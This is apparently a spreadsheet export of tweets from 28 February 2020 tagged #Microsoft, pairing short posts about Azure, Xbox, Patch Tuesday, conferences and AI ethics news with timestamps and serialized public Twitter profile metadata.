#techtips #microsoft #managedserviceprovider #windows10 #techtalk #tech #workproduction</t>
  </si>
  <si>
    <t>{'id': 191728275, 'id_str': '191728275', 'name': 'MotherG', 'screen_name': 'motherGuardians', 'location': 'Itasca, IL, US, 60143', 'description': "Rocking Chicago and Milwaukee's IT services. Weâ€™re about changing the status quo by aligning technology to grow your business. We love our clients and it shows!", 'url': 'https://t.co/lF3gYCkgXu', 'entities': {'url': {'urls': [{'url': 'https://t.co/lF3gYCkgXu', 'expanded_url': 'http://motherg.com/', 'display_url': 'motherg.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 302, 'friends_count': 331, 'listed_count': 19, 'created_at': 'Fri Sep 17 05:28:46 +0000 2010', 'favourites_count': 361, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1367, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EFEFEF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000029927794/ebc296e97ef9478a355cfba8a053c0d8_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000029927794/ebc296e97ef9478a355cfba8a053c0d8_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/191728275/1576018440',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</si>
  <si>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Feb 28 20:05:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has issued one of its largest Patch Tuesday updates for the shortest month of the year, addressing 99 security vulnerabilities across a range of products. https://t.co/ybdL9gU13h #cybersecurity #microsoftoffice</t>
  </si>
  <si>
    <t>{'id': 70647563, 'id_str': '70647563', 'name': 'Netsurion', 'screen_name': 'Netsurion', 'location': 'Fort Lauderdale, FL', 'description': 'Netsurion is a managed security service provider that converges network management, threat protection, and compliance readiness for SMBs and service providers.', 'url': 'https://t.co/EmzIhnveHW', 'entities': {'url': {'urls': [{'url': 'https://t.co/EmzIhnveHW', 'expanded_url': 'http://www.netsurion.com', 'display_url': 'netsurion.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 969, 'friends_count': 554, 'listed_count': 131, 'created_at': 'Tue Sep 01 10:22:15 +0000 2009', 'favourites_count': 2744, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4561,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'http://pbs.twimg.com/profile_images/826518097053962241/RsxfWsZK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/826518097053962241/RsxfWsZK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/70647563/1556645140', 'profile_link_color': '4FBA46',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</si>
  <si>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20:04:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Surface Duo could launch this summer, months ahead of schedule https://t.co/UZIAJlMYbV https://t.co/cY47UsY0gM</t>
  </si>
  <si>
    <t>Fri Feb 28 20:03:59 +0000 2020</t>
  </si>
  <si>
    <t>How Microsoft's Azure organization makes the Windows sausage | ZDNet https://t.co/icjzaPxkks
#Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Fri Feb 28 20:03:09 +0000 2020</t>
  </si>
  <si>
    <t>At #HIMSS20, well share how healthcare organizations worldwide have turned to technology to deliver on their promise of better care. Read the blog to get a primer: https://t.co/sB3JjuBWUN https://t.co/qpRjEZYwqo #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 20:01:56 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #Azure #cloud      Did you know migrating to Microsoft Azure can reduce your data center footprint 73%? Check out this infographic for an overview and contact Archon Security to learn more! https://t.co/xJmnoe68FX</t>
  </si>
  <si>
    <t>Fri Feb 28 20:01:26 +0000 2020</t>
  </si>
  <si>
    <t>Well this will be handy! Cloud based print servers.
#Microsoft #Azure #Printing #PrintServer
https://t.co/rS62g4dQ2S</t>
  </si>
  <si>
    <t>Fri Feb 28 20:00:34 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has released a new version of #VisualStudio Online, its browser companion to the popular #VSCodeEditor.
https://t.co/YQ0FFDzZ9g</t>
  </si>
  <si>
    <t>{'id': 203270362, 'id_str': '203270362', 'name': 'Drund', 'screen_name': 'drund', 'location': 'Youngstown, Ohio', 'description': 'Follow us for updates on all things related to #iOS #Android #Software and #Design.', 'url': 'http://t.co/YmsjWLh6wd', 'entities': {'url': {'urls': [{'url': 'http://t.co/YmsjWLh6wd', 'expanded_url': 'http://www.drund.com', 'display_url': 'drund.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 200, 'friends_count': 153, 'listed_count': 13, 'created_at': 'Fri Oct 15 22:30:27 +0000 2010', 'favourites_count': 885, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1528, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '181818', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1146476884475219968/alSybRad_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1146476884475219968/alSybRad_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/203270362/1566586125', 'profile_link_color': '4FC3F7', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'EDEDED', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 20:00:26 +0000 2020</t>
  </si>
  <si>
    <t>How To Create a New Customer in Microsoft Dynamics 365 Business Central
https://t.co/zcLDKBpINd
#microsoft #customer #howto #training</t>
  </si>
  <si>
    <t>Fri Feb 28 20:00:25 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will open a new datacenter region
https://t.co/xo5jt3Nd2z
#datacenter #cloud #madeiradata https://t.co/laErEPSYoO</t>
  </si>
  <si>
    <t>Fri Feb 28 19:59:34 +0000 2020</t>
  </si>
  <si>
    <t>File under "Whew!"  "#IBM and #Microsoft have signed an 'ethical resolution' with the #Vatican to develop #artificialintelligence in a way that will protect the planet and #humanrights":  https://t.co/4RndvAp2U6 #tech #AI #BigTech #PopeFrancis</t>
  </si>
  <si>
    <t>{'id': 790546093, 'id_str': '790546093', 'name': '(((Alan Tonelson)))', 'screen_name': 'AlanTonelson', 'location': 'Riverdale Park, MD ', 'description': 'Founder of RealityChek - a blog covering economics, national security, tech, &amp; their intersections. Also checking in regularly on the general human condition.', 'url': 'http://t.co/fKktfQdzfF', 'entities': {'url': {'urls': [{'url': 'http://t.co/fKktfQdzfF', 'expanded_url': 'http://alantonelson.wordpress.com', 'display_url': 'alantonelson.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4846, 'friends_count': 916, 'listed_count': 806, 'created_at': 'Thu Aug 30 01:27:25 +0000 2012', 'favourites_count': 9446, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 83783,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'http://pbs.twimg.com/profile_images/2557572063/A.Tonelson06.22jpg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2557572063/A.Tonelson06.22jpg_normal.jpg',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</si>
  <si>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19:52:43 +0000 2020</t>
  </si>
  <si>
    <t>#Trump crowns #Microsoft, #Amazon, #Google and #Apple as trillion-dollar 'MAGA' companies
https://t.co/BfvMBeA3HD</t>
  </si>
  <si>
    <t>Fri Feb 28 19:50:18 +0000 2020</t>
  </si>
  <si>
    <t>#Google, #Amazon and #Microsoft give input to new health AI standard
https://t.co/2uVPN8Q66M</t>
  </si>
  <si>
    <t>Fri Feb 28 19:49:40 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #XboxLive #Xbox #Xbox360 #XboxOne #XboxOneX #GearsOfWar #MajorNelson @MajorNelson RogueSolo72's/RogueSGT's Dream #XB1X Console: 4TB Internal SSD .Drive / X8 HDMI Ports / X4 Ethernet Ports / x1 MicroSD Port / x1 SD Port / x8 USB 3 Ports / x2 3.5mm Audio Out Ports (1/5)</t>
  </si>
  <si>
    <t>{'id': 278107720, 'id_str': '278107720', 'name': 'ROGUE', 'screen_name': 'Roguesolo72', 'location': 'UK/DMðŸ‡©ðŸ‡²&amp;JAðŸ‡¯ðŸ‡² ', 'description': 'â€¢ Gaming Has Always Got Me Through. So Maybe In Your Darkest Times, It Could Do The Same 4u! AOM: XB1X/PS4Pro/PSVita10003G/NSwitch/NewN3DSXL #GFL', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 141, 'friends_count': 379, 'listed_count': 16, 'created_at': 'Wed Apr 06 16:34:56 +0000 2011', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4948,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'http://pbs.twimg.com/profile_images/1372008978/mdmVF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1372008978/mdmVF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/278107720/1546800250',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</si>
  <si>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19:48:41 +0000 2020</t>
  </si>
  <si>
    <t>#AI for #Health  is a philanthropic initiative, support nonprofits and academic collaboration with #Microsoft leading #data scientists, access to best-in-class AI tools and #CloudComputing, and select cash grant https://t.co/HjpY1Fji2f</t>
  </si>
  <si>
    <t>{'id': 66331859, 'id_str': '66331859', 'name': 'Lilac Alsafadi', 'screen_name': 'Lilac000', 'location': '', 'description': 'passionate about technology, innovation and entrepreneurship', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 300, 'listed_count': 0, 'created_at': 'Mon Aug 17 11:16:56 +0000 2009', 'favourites_count': 85, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 109, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FF6699', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1103766929171509273/VcPcnmRR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103766929171509273/VcPcnmRR_normal.jpg', 'profile_link_color': 'B40B43', 'profile_sidebar_border_color': 'CC3366', 'profile_sidebar_fill_color': 'E5507E', 'profile_text_color': '362720', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 19:47:16 +0000 2020</t>
  </si>
  <si>
    <t>After 5 years since #Ori and the Blind Forest
Ori and the Will of the Wisps will take you on an even more beautiful experience. 
With towering enemies and challenging puzzles on your quest to learn the true destiny of Ori.
Available on #XboxOne #Microsoft on 11/03 https://t.co/QIgMwvoLYx</t>
  </si>
  <si>
    <t>{'id': 580158281, 'id_str': '580158281', 'name': 'GAME Surrey Quays', 'screen_name': 'GAMESurreyQuays', 'location': 'Surrey Quays, London SE16 7LL', 'description': 'This is the official Twitter feed of GAME Surrey Quays! Weâ€™re open 11.00-18.00 Monday-Friday, 10.00-18.00 Saturday and 12.00-16.00 Sundays.', 'url': 'https://t.co/9dseonUxBj', 'entities': {'url': {'urls': [{'url': 'https://t.co/9dseonUxBj', 'expanded_url': 'http://www.game.co.uk', 'display_url': 'game.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1022, 'friends_count': 276, 'listed_count': 19, 'created_at': 'Mon May 14 19:20:26 +0000 2012', 'favourites_count': 179, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4833,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'http://pbs.twimg.com/profile_images/856452716620644352/cIp7xfSu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/856452716620644352/cIp7xfSu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/580158281/1546846254', 'profile_link_color': '050505',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</si>
  <si>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19:47:08 +0000 2020</t>
  </si>
  <si>
    <t>{'id': 925959013908582400, 'id_str': '925959013908582400', 'name': 'RS44', 'screen_name': 'Roguesolo_44', 'location': 'UK ðŸ‡¬ðŸ‡§/Reppin/JA ðŸ‡¯ðŸ‡²/DM ðŸ‡©ðŸ‡²/&amp;/AFR ðŸŒ! ', 'description': 'Tech&amp;BassAudioHead/Spiritual/Genious/AndroidAddict/\nOrgGamer/XBsx3/XB360sx3/PS/PS2/PS3sx3/PS4Pro/PSP1000/PSP3000/PSV1000sx2/GC/Wiisx2/GBASP/NDSL/&amp;A/N3DSXL', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 272, 'listed_count': 0, 'created_at': 'Thu Nov 02 05:33:27 +0000 2017', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 698, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/980380445086048257/SxJX9-N6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/980380445086048257/SxJX9-N6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/925959013908582400/1522575849',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</si>
  <si>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19:45:28 +0000 2020</t>
  </si>
  <si>
    <t>#WIMVP #Microsoft #WVD Virtual event: Accelerate Your Windows Virtual Desktop Deployment https://t.co/UOzJAe787R</t>
  </si>
  <si>
    <t>Fri Feb 28 19:45:10 +0000 2020</t>
  </si>
  <si>
    <t>Mover #SharePoint #Migration Tool Now Available to #Microsoft 365 Subscribers -- via @RedmondIT  https://t.co/ANcP1OYnPv</t>
  </si>
  <si>
    <t>{'id': 2226930186, 'id_str': '2226930186', 'name': 'WSC', 'screen_name': 'BostonO365', 'location': 'Waltham, MA', 'description': "Wellington Street Consulting, Boston's premiere Office 365 consultancy. #Sharepoint, #PowerApps, #MicrosoftTeams, and #PowerShell", 'url': 'http://t.co/SwPw6pdKmp', 'entities': {'url': {'urls': [{'url': 'http://t.co/SwPw6pdKmp', 'expanded_url': 'http://www.BostonO365.com', 'display_url': 'BostonO365.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 852, 'friends_count': 1426, 'listed_count': 105, 'created_at': 'Mon Dec 02 16:31:32 +0000 2013', 'favourites_count': 462, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3583,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'http://pbs.twimg.com/profile_images/1180313268004495360/OrT4qoiK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180313268004495360/OrT4qoiK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2226930186/1440477493',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</si>
  <si>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19:44:58 +0000 2020</t>
  </si>
  <si>
    <t>Vatican, IBM and Microsoft call for ethical AI #Microsoft #IBM #pope #ethics #ArtificialIntelligence #AI #ML #MachineLearning #startups #VIKEZ
https://t.co/Cs670uyizl https://t.co/7wVKYpZejg</t>
  </si>
  <si>
    <t>{'id': 3527715379, 'id_str': '3527715379', 'name': 'Vikez', 'screen_name': 'Vikezmedia', 'location': 'San Jose, CA ', 'description': 'Bring you #news all over the world that would  change the way you think about #life, #society, #technology, and #business.', 'url': 'https://t.co/zMTkN2t5Cd', 'entities': {'url': {'urls': [{'url': 'https://t.co/zMTkN2t5Cd', 'expanded_url': 'http://www.vikez.com', 'display_url': 'vikez.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4734, 'friends_count': 5198, 'listed_count': 1608, 'created_at': 'Fri Sep 11 14:43:57 +0000 2015', 'favourites_count': 56608, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 32719,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'http://pbs.twimg.com/profile_images/642348669564416000/hqC3m0nb_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/642348669564416000/hqC3m0nb_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3527715379/1444517475',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</si>
  <si>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Fri Feb 28 19:44:41 +0000 2020</t>
  </si>
  <si>
    <t>Day 2 highlights #microsoft #bam conference. #empowerment #truth #development #microsoftlife #dope https://t.co/7zmhl0RmuP</t>
  </si>
  <si>
    <t>{'id': 23848193, 'id_str': '23848193', 'name': 'KHen06', 'screen_name': 'KHen06', 'location': 'Charlotte', 'description': 'Man of God, Husband, Ultra cool, U.S. Navy Vet, Bon Vivant, AÎ¦Î‘, BÎ” Spr. 96. SCSU. Tech Deal Maker, Global Business Developer. Sartorial splendor. Jet setter.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 761, 'friends_count': 1143, 'listed_count': 63, 'created_at': 'Wed Mar 11 22:59:32 +0000 2009', 'favourites_count': 4223, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 33323,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'http://pbs.twimg.com/profile_images/1076507120869220352/ng2EKmxg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1076507120869220352/ng2EKmxg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23848193/1404047484',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</si>
  <si>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19:42:54 +0000 2020</t>
  </si>
  <si>
    <t>Check out my  #tutorial on how to create forms in #Microsoft Forms @MicrosoftEDU https://t.co/buiV576qTM @ytcreators @YouTube #forms</t>
  </si>
  <si>
    <t>Fri Feb 28 19:42:40 +0000 2020</t>
  </si>
  <si>
    <t>Heading up to Glasgow tonight for the @scottishsummit , just finalising which sessions I'm heading to. Hard to decide!!! 
#Glasgow #ScottishSummit #Microsoft #Dynamics365 #PowerPlatform #Office365 #Azure #PowerApps #IngramMicro #MicrosoftPartnerNetwork #CloudTechnology #Cloud https://t.co/TZzgzXBCCX</t>
  </si>
  <si>
    <t>Fri Feb 28 19:42:36 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Data Science: Supervised Machine Learning in Python #udemycoupon -&amp;gt; https://t.co/UsdxkhuDs5
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Fri Feb 28 19:42:13 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Hackers Use Windows 10 RDP ActiveX Control to Run Griffon Backdoor:" https://t.co/z30lQCt2fl
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Feb 28 19:41:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has fallen to last summers level of 156 from its recent 190 high.
#Microsoft #investmentideas #crudeoil #Brent #coronavirus #cloudcomputing #finance  https://t.co/33rQuPAOrc</t>
  </si>
  <si>
    <t>{'id': 1077899920399572992, 'id_str': '1077899920399572992', 'name': 'Matein Khalid', 'screen_name': 'KhalidMatein', 'location': 'Dubai, United Arab Emirates', 'description': 'Matein Khalid is the Chief Investment Officer &amp; Partner at Asas Capital in the DIFC, Dubai.', 'url': 'https://t.co/7MX92PvAnI', 'entities': {'url': {'urls': [{'url': 'https://t.co/7MX92PvAnI', 'expanded_url': 'https://www.linkedin.com/today/author/matein-khalid-309275167', 'display_url': 'linkedin.com/today/author/mâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 67, 'friends_count': 6, 'listed_count': 0, 'created_at': 'Wed Dec 26 12:12:22 +0000 2018', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 88, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1077901160646934528/0wBlb_fI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1077901160646934528/0wBlb_fI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1077899920399572992/1580491760',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</si>
  <si>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19:40:09 +0000 2020</t>
  </si>
  <si>
    <t>Day 1 highlights part 2 #microsoft #bam conference. #empowerment #truth #development #microsoftlife #criminaljusticereform https://t.co/4v8zF4ZLjt</t>
  </si>
  <si>
    <t>Fri Feb 28 19:40:07 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is discontinuing Cortana consumer skills starting with Windows 10 20H1 https://t.co/Yor2ogeGOJ #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 19:39:27 +0000 2020</t>
  </si>
  <si>
    <t>End-to-end IoT device security with Azure Sphere | Azure Friday  https://t.co/ST6QHx2cOy  #Azure #Microsoft #azureflashnews</t>
  </si>
  <si>
    <t>Fri Feb 28 19:39:20 +0000 2020</t>
  </si>
  <si>
    <t>Azure Sentinel: Creating Custom Connectors https://t.co/FV62wTWJDr #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 19:38:27 +0000 2020</t>
  </si>
  <si>
    <t>@Windows 10 w/ centered task bar 
@Microsoft productivity services 
#Microsoft #Windows #Windows10 https://t.co/LXIb77GLKG</t>
  </si>
  <si>
    <t>{'id': 1233472736686755840, 'id_str': '1233472736686755840', 'name': 'J', 'screen_name': 'jguegal', 'location': '', 'description': 'Dev - @Microsoft enthusiast', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 41, 'listed_count': 0, 'created_at': 'Fri Feb 28 19:23:25 +0000 2020', 'favourites_count': 5,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</si>
  <si>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Feb 28 19:36:18 +0000 2020</t>
  </si>
  <si>
    <t>Day 1 highlights part 1 #microsoft #bam conference. #empowerment #truth #development #microsoftlife #dope https://t.co/mzxumaq9Tz</t>
  </si>
  <si>
    <t>Fri Feb 28 19:35:12 +0000 2020</t>
  </si>
  <si>
    <t>End-to-end IoT device security with Azure Sphere https://t.co/VnEmpTQmXv #Microsoft #Azure</t>
  </si>
  <si>
    <t>Fri Feb 28 19:35:11 +0000 2020</t>
  </si>
  <si>
    <t>A quick intro to the Azure Stack portfolio https://t.co/1dzCVsFqQO #Microsoft #Azure</t>
  </si>
  <si>
    <t>Fri Feb 28 19:35:04 +0000 2020</t>
  </si>
  <si>
    <t>@The_Gibus_Man Yes!! Master Chief in Smash Bros #microsoft #nintendo #smashbros #masterchief #dlc https://t.co/O2xXJ7pcn0</t>
  </si>
  <si>
    <t>Fri Feb 28 19:34:21 +0000 2020</t>
  </si>
  <si>
    <t>@gmail feature request : Auto capitalisation!!
With smart suggestions already in place..its time to have auto-capitalisation in GMail !!
@sundarpichai @MKBHD @reckless 
#gmail #googlemaps #google #sundarpichai #apple #microsoft #samsung #oneplus #huawei #xiaomi #android</t>
  </si>
  <si>
    <t>Fri Feb 28 19:30:14 +0000 2020</t>
  </si>
  <si>
    <t>This clearly says just in case you forget your password so how do I use these questions to reset the password?? Never seen a prompt #microsoft #macrohard #win10 https://t.co/NqUd0yvmuV</t>
  </si>
  <si>
    <t>{'id': 21922128, 'id_str': '21922128', 'name': 'Quark Tepleoni', 'screen_name': 'thebigtea', 'location': 'Billy Mays Shirt Pocket', 'description': 'Legendus Absolutus', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 150, 'friends_count': 262, 'listed_count': 8, 'created_at': 'Wed Feb 25 21:31:43 +0000 2009', 'favourites_count': 1029, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7716,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'http://pbs.twimg.com/profile_images/82943771/08112007945_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/82943771/08112007945_normal.jpg',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</si>
  <si>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Feb 28 19:28:21 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 19:27:19 +0000 2020</t>
  </si>
  <si>
    <t>Speakers dinner looking forward to meeting 1100 attendees tomorrow- this is BIG!! @ScottishSummit #SS2020 #Office365 #Microsoft365 #MicrosoftTeams #SharePoint #PowerPlatform #Microsoft #Glasgow https://t.co/OiZKNLVo0i</t>
  </si>
  <si>
    <t>Fri Feb 28 19:25:06 +0000 2020</t>
  </si>
  <si>
    <t>Dear #Microsoft #MVPBuzz #Azure #AzureStack #AzureStackHub communities, I never ask anything of you, but if you retweet this I can win two bottles of fizz at this amazing MS conference in Scotland with 1000+ attendees :D @thurrott @jsnover @shanselman @natmack @maryjofoley https://t.co/CPLUgcElXf</t>
  </si>
  <si>
    <t>{'id': 18226862, 'id_str': '18226862', 'name': 'Kenny Lowe', 'screen_name': 'KennyLowe', 'location': 'ÃœT: 56.464241,-2.974549', 'description': 'Senior Principal Azure Stack Technologist, EMEA | Dell EMC | MCT | MVP | #Azure #AzureStack #AzureStackHub #NeverStopLearning ðŸŒ¥ðŸ´\U000e0067\U000e0062\U000e0073\U000e0063\U000e0074\U000e007f', 'url': 'https://t.co/UMNQnhmvje', 'entities': {'url': {'urls': [{'url': 'https://t.co/UMNQnhmvje', 'expanded_url': 'http://www.azurestack.tips', 'display_url': 'azurestack.tips', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2708, 'friends_count': 1071, 'listed_count': 128, 'created_at': 'Thu Dec 18 22:07:28 +0000 2008', 'favourites_count': 9383, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 31361,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'http://pbs.twimg.com/profile_images/1202664023122165760/f1CuSKcp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202664023122165760/f1CuSKcp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18226862/1538360310',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</si>
  <si>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Feb 28 19:23:17 +0000 2020</t>
  </si>
  <si>
    <t>Keep an eye open for the latest video from #TheAzureAcademy on Monday...The NEW #AzureFiles with #ActiveDirectory #Authentication with #FSLogix and #windowsvirtualdesktop
Stay tuned!
#azure #virtualmachines #wvd #msignitethetour #microsoft #vdi #azuresecurity #citrix</t>
  </si>
  <si>
    <t>Fri Feb 28 19:22:00 +0000 2020</t>
  </si>
  <si>
    <t>The Perfect Pairing for Your Business https://t.co/kaeEtkrtgD
#AccountingSoftware #SubscriptionBilling #TechBiz #AccountingNews #DigitalNomad #TechGeeks #MsPartners #Microsoft #applications #BusinessTech #Controllers #QuickBooks #ProAdvisors #Upgrade https://t.co/8yhY4fBfwA</t>
  </si>
  <si>
    <t>Fri Feb 28 19:21:25 +0000 2020</t>
  </si>
  <si>
    <t>Condiments, Power Apps, mouse support on iPads and high school basketball playoff seeding tiebreakers. Yeah... #podcasts #apple #ipad #microsoft https://t.co/q4uNuT1zBB</t>
  </si>
  <si>
    <t>{'id': 23135999, 'id_str': '23135999', 'name': 'Levi Walker Gilbert', 'screen_name': 'LeviGilbert', 'location': 'Conway, AR', 'description': 'Save It for the MicðŸŽ™ï¸ podcast: https://t.co/vibf21lYuX. Learning Specialist @acxiom. Associate Editor @501lifemag. Color Commentator @5sportslive.', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/vibf21lYuX', 'expanded_url': 'https://goo.gl/WCe9KF', 'display_url': 'goo.gl/WCe9KF', 'indices': [31, 54]}]}}, 'protected': False, 'followers_count': 340, 'friends_count': 634, 'listed_count': 7, 'created_at': 'Fri Mar 06 23:30:33 +0000 2009', 'favourites_count': 3776, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7138,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'http://pbs.twimg.com/profile_images/1181668284812419072/ga_b9YNT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181668284812419072/ga_b9YNT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23135999/1522786653',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</si>
  <si>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19:19:17 +0000 2020</t>
  </si>
  <si>
    <t>@Oracle is upping its game in the race against #Microsoft and #Amazon for #cloud computing market share. @Reuters #cdwsocial https://t.co/BFcMXw6U04</t>
  </si>
  <si>
    <t>Fri Feb 28 19:19:10 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 19:19:02 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 19:17:25 +0000 2020</t>
  </si>
  <si>
    <t>Cross 3k+ unique installs in just 3 month #Microsoft #blazor #template 
https://t.co/bURuT1kHHX https://t.co/bx4j0YviEd</t>
  </si>
  <si>
